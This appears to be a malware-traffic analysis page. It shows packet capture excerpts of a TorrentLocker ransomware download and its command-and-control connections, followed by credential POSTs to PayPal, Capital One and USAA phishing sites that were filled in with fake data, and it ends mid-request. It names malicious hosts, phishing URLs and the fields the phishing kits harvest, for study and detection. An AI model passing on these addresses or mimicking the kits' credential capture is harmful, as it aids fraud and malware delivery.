Ransomware Torrentlocker TOR Malware Crimeware Botnet PCAP file download traffic sample oft.gfd

SHA256: 9c1b8dc277ae7c75a446a9ffb2d6eb05da48e27d699f095dd3838180b54d0459
File name: oft.gfd
Detection ratio: 32 / 57
Analysis date: 2017-04-26 02:03:42 UTC ( 1 minute ago )
ESET-NOD32 Win32/Filecoder.TorrentLocker.A 20170425
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9984 20170424
GData Win32.Trojan.Agent.84RAT9 20170425
Cyren W32/Trojan.TNFL-3209 20170425
Fortinet W32/Injector.DOCE!tr 20170425
Comodo UnclassifiedMalware 20170425
Kaspersky UDS:DangerousObject.Multi.Generic 20170425
ZoneAlarm by Check Point UDS:DangerousObject.Multi.Generic 20170425
AegisLab Uds.Dangerousobject.Multi!c 20170425
Invincea trojan.win32.skeeyah.a!rfn 20170413
AVware Trojan.Win32.Generic!BT 20170425
VIPRE Trojan.Win32.Generic!BT 20170425
F-Secure Trojan.GenericKD.4930825 20170425
Emsisoft Trojan.GenericKD.4929489 (B) 20170425
Ad-Aware Trojan.GenericKD.4929489 20170425
BitDefender Trojan.GenericKD.4929489 20170425
eScan Trojan.GenericKD.4929489 20170425
Arcabit Trojan.Generic.D4B37D1 20170425
Qihoo-360 Trojan.Generic 20170426
Panda Trj/RansomCrypt.E 20170424

2017-04-25 21:29:09.776867 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [.], ack 2711491197, win 256, length 0
E..(J.@……..f..<z.q.Pg..@…}P………….
2017-04-25 21:29:09.782018 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /file/oft.gfd HTTP/1.1
E..EJ.@……..f..<z.q.Pg..@…}P…”!..GET /file/oft.gfd HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: costfer.pl
Connection: Keep-Alive
2017-04-25 21:29:58.373426 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [S], seq 927389296, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….M…f..L..r..7F.p…… ..U…………..
2017-04-25 21:29:58.502366 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [.], ack 847962573, win 256, length 0
E..(..@….X…f..L..r..7F.q2…P…f………
2017-04-25 21:29:58.503090 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [P.], seq 0:101, ack 1, win 256, length 101
E…..@……..f..L..r..7F.q2…P…b…….`…\…..}U\………u…:..N..$.*..G$……/.5.
………%………www.6i8oni0h17kj6ab3.com.#..

2017-04-25 21:30:37.138220 IP 192.168.1.102.63094 > 5.12.153.81.80: Flags [P.], seq 0:79, ack 1, win 64952, length 79: HTTP: GET /plain HTTP/1.1
E..w`>@…9….f…Q.v.P..p..p.lP…….GET /plain HTTP/1.1
Accept: */*
Host: ipecho.net
Cache-Control: no-cache

2017-04-25 21:30:37.359215 IP 192.168.1.102.63094 > 5.12.153.81.80: Flags [.], ack 246, win 64707, length 0
E..(`?@…:%…f…Q.v.P..qG.p.aP…`9……..
2017-04-25 21:30:38.162461 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [F.], seq 570, ack 821334, win 3963, length 0
E..(K.@……..f..<z.q.Pg..z….P..{6………
2017-04-25 21:30:59.837934 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [S], seq 1480060622, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.J@……..f.S.”.w.PX7…….. ……………..
2017-04-25 21:30:59.930355 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [.], ack 1970375308, win 256, length 0
E..(.K@……..f.S.”.w.PX7..uq..P………….
2017-04-25 21:30:59.930885 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [P.], seq 0:99, ack 1, win 256, length 99: HTTP
E….L@……..f.S.”.w.PX7..uq..P………..^…Z…&..72.^…^s.>……C..W.)..Z……../.5.
………#………www.a8k57b0dj9j4me.com.#..

 

2017-04-25 21:31:07.334094 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [S], seq 2222676753, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4_.@……..f../..x#..{[……. ..C…………..
2017-04-25 21:31:07.423242 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [.], ack 423700117, win 256, length 0
E..(_.@……..f../..x#..{[..A&.P….0……..
2017-04-25 21:31:07.423774 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [P.], seq 0:100, ack 1, win 256, length 100
E…_.@……..f../..x#..{[..A&.P….`……_…[..T..|.KaU.O3.n…K!…..Y.ic…F……./.5.
………$………www.neoc27io5cf1ian.com.#..
2017-04-25 21:31:07.516179 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [.], ack 9, win 256, length 0
E..(_.@……..f../..x#..{[v.A&.P………….
2017-04-25 21:31:12.515250 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [S], seq 176368332, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|.@……..f./…y..
.*……. ..8…………..
2017-04-25 21:31:12.621598 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [.], ack 2263376506, win 256, length 0
E..(|.@……..f./…y..
.*…bzP………….
2017-04-25 21:31:12.622117 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [P.], seq 0:93, ack 1, win 256, length 93
E…|.@….i…f./…y..
.*…bzP………..X…T……_.~5YV%….q..Dh.n.P…+.eO……./.5.
……………….www.1aaf7d6d.com.#..
2017-04-25 21:31:12.878200 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [.], ack 9, win 256, length 0
E..(|.@……..f./…y..
.+*..b.P….4……..

PayPal Phishing Scam Fake Website PCAP file download Traffic Sample

PayPal Phishing landing page:

 

Stealing Credentials Traffic:

 

2017-04-17 22:00:47.498090 IP 192.168.1.100.46042 > 184.154.127.226.80: Flags [P.], seq 1:785, ack 1, win 229, options [nop,nop,TS val 1037083633 ecr 3076619526], length 784: HTTP: POST /inc/login.php HTTP/1.1
E..D..@.@..W…d…….P…2..a]………..
=….a}.POST /inc/login.php HTTP/1.1
Host: www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com/
Content-Length: 285
Connection: keep-alive

user=johnny5alive%40gmail.com&pass=johnny5alive&xBrowser=Mozilla+FireFox+v43&xOperatingSystem=Linux&xPlatForm=Desktop+Platform&xTimeZone=Mon+Apr+17+2017+22%3A00%3A35+GMT-0400+(EDT)&xResoLution=Computer%3A+1920×1080%3B+Browser+inner%3A+1920×762%3B+Browser+outer%3A+1920×1027&xLang=en-US
2017-04-17 22:00:47.557561 IP 184.154.127.226.80 > 192.168.1.100.46042: Flags [.], ack 785, win 239, options [nop,nop,TS val 3076619602 ecr 1037083633], length 0
E..4..@.4.0,…….d.P….a]..  B….   ……
.a}R=…
2017-04-17 22:00:48.036469 IP 192.168.1.100.47166 > 52.22.15.101.443: Flags [.], ack 1, win 839, options [nop,nop,TS val 1037083768 ecr 547964563], length 0
E..4C.@.@.. …d4..e.>….zx…Z…G…….
=..x .F.
2017-04-17 22:00:48.052170 IP 52.22.15.101.443 > 192.168.1.100.47166: Flags [.], ack 1, win 422, options [nop,nop,TS val 547967075 ecr 1037066196], length 0
E..4S@@…2.4..e…d…>…Z..zy………..
.Pc=._.
2017-04-17 22:00:48.405903 IP 184.154.127.226.80 > 192.168.1.100.46042: Flags [P.], seq 1:369, ack 785, win 239, options [nop,nop,TS val 3076620452 ecr 1037083633], length 368: HTTP: HTTP/1.1 200 OK
E…..@.4……….d.P….a]..  B….A……
.a..=…HTTP/1.1 200 OK
Date: Tue, 18 Apr 2017 01:59:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=63752465833b6cd873511e4cdeb8799e; path=/
Vary: User-Agent
Content-Length: 13
Connection: close
Content-Type: text/html

success_no_tl

CapitalOne Capital One Bank Auto Loans Phishing Campaign PCAP file download Traffic Analysis

Landing page:

 

Sample of posting credentials:

 

2017-04-17 21:57:05.598674 IP 192.168.1.100.41236 > 89.46.73.231.80: Flags [P.], seq 1:535, ack 1, win 229, options [nop,nop,TS val 1037028158 ecr 1270481385], length 534: HTTP: POST /CapitaLonE/SignIn/page/booting.php HTTP/1.1
E..J;.@.@……dY.I….P.5..u}>P….g^…..
=..>K…POST /CapitaLonE/SignIn/page/booting.php HTTP/1.1
Host: 89.46.73.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://89.46.73.231/CapitaLonE/SignIn/page/
Cookie: PHPSESSID=aepqe8mcrenvcnj1utpej09oi2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

userId=johnny5&userPass=johnny5
2017-04-17 21:57:05.722090 IP 89.46.73.231.80 > 192.168.1.100.41236: Flags [.], ack 535, win 243, options [nop,nop,TS val 1270481511 ecr 1037028158], length 0
E..4<7@.5..kY.I….d.P..u}>P.5………….
K..g=..>
2017-04-17 21:57:06.135295 IP 89.46.73.231.80 > 192.168.1.100.41236: Flags [P.], seq 1:273, ack 535, win 243, options [nop,nop,TS val 1270481924 ecr 1037028158], length 272: HTTP: HTTP/1.1 302 Moved Temporarily
E..D<8@.5..ZY.I….d.P..u}>P.5……l……
K…=..>HTTP/1.1 302 Moved Temporarily
Date: Tue, 18 Apr 2017 01:55:28 GMT
Server: Apache/2.4.25 (Unix)
X-Powered-By: PHP/5.6.30
Location: ../page/index1.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

USAA Phishing Campaign PCAP File Download Traffic Analysis Sample

They do make the site look decent:

 

Here you can see the POST containing the fake information I entered:

 

2017-04-17 21:32:22.952265 IP 192.168.1.100.47366 > 78.135.65.3.80: Flags [.], seq 1:2849, ack 1, win 229, options [nop,nop,TS val 1036657496 ecr 1337509293], length 2848: HTTP: POST /wp-content/usa/account/logind.php HTTP/1.1
E..T..@.@.=a…dN.A….P%Z…L……\……
=.#XO…POST /wp-content/usa/account/logind.php HTTP/1.1
Host: www.lidergold.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.lidergold.com/wp-content/usa/account/USAA%20_%20Welcome%20to%20USAA.htm
Cookie: utag_main=v_id:015b7e84629b00a6d3faa895bd3001055005200900bd0$_sn:2$_ss:0$_st:1492480920811$_pn:3%3Bexp-session$ses_id:1492479023089%3Bexp-session; AMCV_47977B2A53A852210A490D45%40AdobeOrg=1999109931%7CMCMID%7C23146858886530304112860983349877067372%7CMCAAMLH-1493083927%7C7%7CMCAAMB-1493083927%7CNRX38WO0n5BH8Th-nqAG_A%7CMCAID%7CNONE%7CMCOPTOUT-1492479066.975%7CNONE; _ga=GA1.2.1621913373.1492479052; AMCVS_47977B2A53A852210A490D45%40AdobeOrg=1; s_pers=%20gpv_pn%3Dwww%257Cent%257Cent%257Cent%257Cn_a%257Cn_a%257Cpin%257Cpin_entry%7C1492480859711%3B%20s_nr%3D1492479059713-New%7C1495071059713%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dusaadev3%253D%252526c.%252526a.%252526activitymap.%252526page%25253Dwww%2525257Cent%2525257Cent%2525257Cent%2525257Cn_a%2525257Cn_a%2525257Cpin%2525257Cpin_entry%252526link%25253DNext%252526region%25253Dyui_3_3_0_4_149247905128121%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%252526pid%25253Dwww%2525257Cent%2525257Cent%2525257Cent%2525257Cn_a%2525257Cn_a%2525257Cpin%2525257Cpin_entry%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257B%2525257D%252526oidt%25253D2%252526ot%25253DSUBMIT%3B; aam_sc=aam%3D2056278%2Caam%3D2819030%2Caam%3D2819037%2Caam%3D3008635%2Caam%3D2940788%2Caam%3D2940810%2Caam%3D3546821%2Caam%3D3661938%2Caam%3D3661939%2Caam%3D2964854; fltk=segID%3D2453279%2CsegID%3D2090930; s_fid=01359BE61903FC17-3D6FFA8644830364; s_sq=usaadev3%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.lidergold.com%25252Fwp-content%25252Fusa%25252Faccount%25252FUSAA%25252520_%25252520Welcome%25252520to%25252520USAA.htm%2526oid%253DLog%252520On%2526oidt%253D3%2526ot%253DSUBMIT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1628

userid=pwnyou%40yourpwned.com&password=harharhar123&fp_syslang=&CSRFToken=778d07881ecc5398b4bd766ec1d697f5&fp_software=&fp_userlang=undefined&fp_display=24%7C1920%7C1080%7C1053&fp_lang=lang%3Den-US%7Csyslang%3D%7Cuserlang%3D&fp_timezone=-5&fp_browser=mozilla%2F5.0+%28×11%3B+linux+x86_64%3B+rv%3A43.0%29+gecko%2F20100101+firefox%2F43.0+iceweasel%2F43.0.4%7C5.0+%28X11%29%7CLinux+x86_64&risk_deviceprint=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528×11%253B%2520linux%2520×86%255F64%253B%2520rv%253A43%252E0%2529%2520gecko%252F20100101%2520firefox%252F43%252E0%2520iceweasel%252F43%252E0%252E4%257C5%252E0%2520%2528X11%2529%257CLinux%2520×86%2